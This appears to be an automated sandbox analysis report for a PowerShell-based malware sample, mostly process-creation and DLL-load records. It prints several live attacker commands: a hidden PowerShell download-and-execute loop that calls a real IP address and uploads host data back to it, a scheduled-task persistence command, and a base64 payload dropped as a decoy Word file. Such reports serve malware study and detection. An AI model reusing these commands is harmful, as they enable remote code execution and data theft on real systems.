              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\appdata\local\temp\Return.docx" /o ""Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /fJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknownJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $iik=new-object net.webclient;$flm=$iik.downloaddata('http://147.78.46.40:37662/xsSpQbSOGHyzMLxZ/page164/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$bjdo+=IEX $jkr|out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};$ujk=new-object net.webclient;$ujk.uploaddata('http://147.78.46.40:43891/page164',$drpy);}Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp140.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
              Source: Binary string: ystem.Core.pdbz source: powershell.exe, 0000000E.00000002.3044779615.0000020A42327000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 0000000E.00000002.3045473811.0000020A424F0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdbCore.pdb source: powershell.exe, 0000000E.00000002.3045473811.0000020A424F0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000E.00000002.2976704530.0000020A2833C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.3045473811.0000020A4252E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ion.pdb source: powershell.exe, 0000000E.00000002.3045473811.0000020A4252E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: *.pdb\ source: powershell.exe, 0000000E.00000002.3043497362.0000020A42291000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: icrosoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbh source: powershell.exe, 0000000E.00000002.3045473811.0000020A424F0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdb source: powershell.exe, 0000000E.00000002.3045473811.0000020A424F0000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($temp);set-content $home\appdata\local\temp\Return.docx -value $fil -encoding byte;&$home\appdata\local\temp\Return.docx;$a='ZGltIHIsIGMNCnNldCByID0gY3JlYXRlb2JqZWN0KCJXU2NyaXB0LlNoZW
              Suspicious powershell command line found
              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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
